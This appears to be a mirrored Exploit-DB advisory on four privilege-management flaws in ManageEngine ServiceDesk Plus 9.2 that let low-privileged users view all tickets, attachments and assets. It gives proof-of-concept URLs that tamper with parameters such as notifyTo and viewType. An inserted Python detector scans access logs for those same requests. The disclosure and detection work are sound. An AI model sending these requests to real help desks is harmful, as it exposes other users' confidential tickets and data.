exploit-db-mirror/platforms/java/webapps/40569.txt
Offensive Security 557f116d02 DB: 2016-10-19
2016-10-19 05:01:18 +00:00


Title: ManageEngine ServiceDesk Plus Low Privileged User View All Tickets
Date: 18 October 2016
Author: p0z
Vendor: ManageEngine
Vendor Homepage: https://www.manageengine.com/
Product: ServiceDesk Plus
Version: 9.2 Build 9207 (Other versions could also be affected)
Fixed Version: 9.2 Build 9228 (Released on: 29 September 2016)
Fixed version readme URL: https://www.manageengine.com/products/service-desk/readme-9.2.html
Vendor report IDs: SD-63280, SD-63281, SD-63282, SD-63283

Product Introduction
==========================
ServiceDesk Plus is ITIL-ready help desk software with integrated Asset and Project Management capabilities.
With advanced ITSM functionality and easy-to-use capability, ServiceDesk Plus helps IT support teams deliver
world-class service to end users with reduced costs and complexity. It comes in three editions and is available
in 29 different languages. Over 100,000 organizations, across 185 countries, trust ServiceDesk Plus to optimize
IT service desk performance and achieve high end user satisfaction.
Source: https://www.manageengine.com/products/service-desk/

Vulnerability Information
==========================
Class: Improper Privilege Management
Impact: Low privileged user can access sensitive data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A

Vulnerability Description
==========================
A low-privileged user is able to view all requests/tickets (including attachments).

Vulnerability Details
==========================
SD-63280:
A low-privileged user can change the value of the "notifyTo" variable to "REQFORWARD" and gain access to advanced features.
The user can then change the ticket id (variable "id") to view any request, including its attachments, and
forward it by e-mail.
SD-63281:
A low-privileged user can send the "Submit for Approval" e-mail even without the permission needed
to view the request.
SD-63282:
A low-privileged user can view other users' assets using the URL below.
(The assets associated with the administrator user could be viewed using the guest login.)
SD-63283:
A low-privileged user can change the value of the "viewType" variable to "All" and see a preview of all requests.

Proof-of-Concept
==========================
SD-63280:
http://localhost:9090/SDNotify.do?notifyModule=Request&mode=E-Mail&id=1&notifyTo=REQFORWARD
SD-63281:
http://localhost:9090/SubmitForApproval.do?ITEMID=1&MODULE=Request
SD-63282:
http://localhost:9090/UserAssets.do?userId=3
SD-63283:
http://localhost:9090/ListRequests.do?reqId=1&viewType=All
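The four issues above share one shape: a request whose authorization is decided by a client-supplied parameter. The following detection example is added here and is not part of the advisory or of ManageEngine's code; it scans web-server access logs (Common Log Format, a constructed sample is embedded) for the four endpoint/parameter combinations the advisory documents and groups hits per client, so that one account walking through many ticket ids on the forward screen stands out.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Added example, not the advisory's code. One rule per vendor ID: endpoint,
# parameter and the value a low-privileged account should not need (None = any).
RULES = {
    "SD-63280": ("/SDNotify.do", "notifyTo", "REQFORWARD"),
    "SD-63281": ("/SubmitForApproval.do", "MODULE", "Request"),
    "SD-63282": ("/UserAssets.do", "userId", None),
    "SD-63283": ("/ListRequests.do", "viewType", "All"),
}
# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
# Constructed sample: 10.0.0.5 walks ticket ids 1..3 through the forward
# screen and hits the other three PoC URLs; 10.0.0.9 is benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2016:10:01:02 +0000] "GET /SDNotify.do?notifyModule=Request&mode=E-Mail&id=1&notifyTo=REQFORWARD HTTP/1.1" 200 5120
10.0.0.5 - - [18/Oct/2016:10:01:09 +0000] "GET /SDNotify.do?notifyModule=Request&mode=E-Mail&id=2&notifyTo=REQFORWARD HTTP/1.1" 200 4990
10.0.0.5 - - [18/Oct/2016:10:01:15 +0000] "GET /SDNotify.do?notifyModule=Request&mode=E-Mail&id=3&notifyTo=REQFORWARD HTTP/1.1" 200 5011
10.0.0.5 - - [18/Oct/2016:10:02:30 +0000] "GET /ListRequests.do?reqId=1&viewType=All HTTP/1.1" 200 20480
10.0.0.5 - - [18/Oct/2016:10:03:01 +0000] "GET /UserAssets.do?userId=3 HTTP/1.1" 200 3000
10.0.0.5 - - [18/Oct/2016:10:03:20 +0000] "GET /SubmitForApproval.do?ITEMID=1&MODULE=Request HTTP/1.1" 200 800
10.0.0.9 - - [18/Oct/2016:10:05:00 +0000] "GET /images/logo.png HTTP/1.1" 200 9000
"""


def match_rules(target):
    """Return (matching vendor IDs, parsed query) for one request target."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    hits = [vid for vid, (path, param, value) in RULES.items()
            if parts.path == path and param in query
            and (value is None or value in query[param])]
    return hits, query


def analyze(log_text):
    """Group rule hits per client. Only successful (<400) responses count: a
    patched build should reject these requests from low-privileged users."""
    report = defaultdict(lambda: {"hits": defaultdict(int), "forwarded_ids": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or int(m.group(3)) >= 400:
            continue
        hits, query = match_rules(m.group(2))
        for vid in hits:
            report[m.group(1)]["hits"][vid] += 1
            if vid == "SD-63280":  # distinct ticket ids opened via forward = enumeration
                report[m.group(1)]["forwarded_ids"].update(query.get("id", []))
    return {c: {"hits": dict(v["hits"]), "forwarded_ids": sorted(v["forwarded_ids"])}
            for c, v in report.items()}
```

Correlating the flagged client with the application's own session log tells you whether the account was a requester or a technician, which decides whether a hit is an incident or normal help-desk work.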

Timeline
==========================
09-04-2016: Vendor notified.
02-06-2016: Vendor assigned vulnerability IDs.
29-09-2016: Vulnerability fixed.